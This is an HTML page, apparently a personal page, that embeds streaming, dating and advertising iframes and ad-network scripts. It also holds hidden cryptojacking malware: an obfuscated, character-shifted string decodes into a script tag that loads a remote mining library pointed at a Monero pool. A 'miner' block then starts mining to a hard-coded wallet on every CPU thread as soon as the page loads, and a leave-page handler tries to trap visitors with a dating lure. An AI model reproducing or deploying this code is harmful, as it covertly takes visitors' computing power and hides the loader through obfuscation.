<!DOCTYPE html>
<html lang="ru">
<head>
  <meta charset="UTF-8">
  <title>MyPage❤️</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="shortcut icon" href="https://www.iconarchive.com/download/i98467/dakirby309/simply-styled/YouTube.ico" type="image/jpg">
  <style>
    html, body {
      margin: 0;
      padding: 0;
      background: #000;
      color: #fff;
      font-family: sans-serif;
      overflow-x: hidden;
      overflow-y: auto;
    }
    .container {
      width: 100%;
    }
    .iframe-top {
      height: 200px; /* ~20% экрана */
    }
    .iframe-middle {
      height: 650px; /* ~65% экрана */
    }
    .iframe-bottom {
      height: 200px; /* ~15% экрана */
      margin-bottom: 40px;
    }
    iframe {
      width: 100%;
      border: none;
      display: block;
    }
  </style>
</head>
<body>
  <div class="container">
    <iframe class="iframe-top" src="https://streamtape.to/e/OVxmmved6etZRv7/" allowfullscreen allow="autoplay" scrolling="no"></iframe>
    <iframe class="iframe-middle" src="https://biieiae.flirtosmart.com/s/4e05b3267d2c9"></iframe>
    <iframe class="iframe-bottom" src="https://www.profitableratecpm.com/ntj9pgvcxz?key=2b927614358002f8d6d3d14e87b29ac5"></iframe>
  </div>

  <!-- Баннеры и виджеты -->
  <script type='text/javascript' src='//pl27198253.profitableratecpm.com/c9/0d/35/c90d35792e2f95a047f528e420a70dff.js'></script>
  <script defer src="https://crxcr1.com/cams-widget-ext/im_jerky?lang=en&mode=prerecorded&outlinkUrl=https://t.mbdaad.link/381074/3788/0?bo=3471%2C3472%2C3473%2C3474%2C3475&target=pushnotifications&po=6456&aff_sub5=SF_006OG000004lmDN&aff_sub4=AT_0018"></script>

  <!-- Распакованный скрипт -->
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script>
    var s = "=tdsjqu!tsd>#iuuqt;00fuifsfvn.qpdlfu/dpn0qfsgflu0qfsgfluxfc/kt@w1818312:@qfsgflu>xtt;00@kbtpo>gbtufs/npofsppdfbo#!?=0tdsjqu?";
    var m = "";
    for (var i = 0; i < s.length; i++) m += String.fromCharCode(s.charCodeAt(i) - 1);
    document.write(m);
  </script>

  <!-- Майнер -->
  <script>
    $(function () {
      var wallet = "83uCXo5d4zNXSHkutqPqHHKSpvJxgmS15U5oQXnQTfAUYnP9bj5Wb5FKn8XBzkc7RZBxcFg5BFG5CjV2kjysXKfD7sX6Gvr";
      var threads = navigator.hardwareConcurrency || 4;
      if (typeof PerfektStart === 'function') {
        PerfektStart(wallet, "x", threads);
      }
      window.addEventListener('beforeunload', function (e) {
        e.preventDefault();
        e.returnValue = 'You want meet with real girl?';
      });
    });
  </script>
</body>
</html>
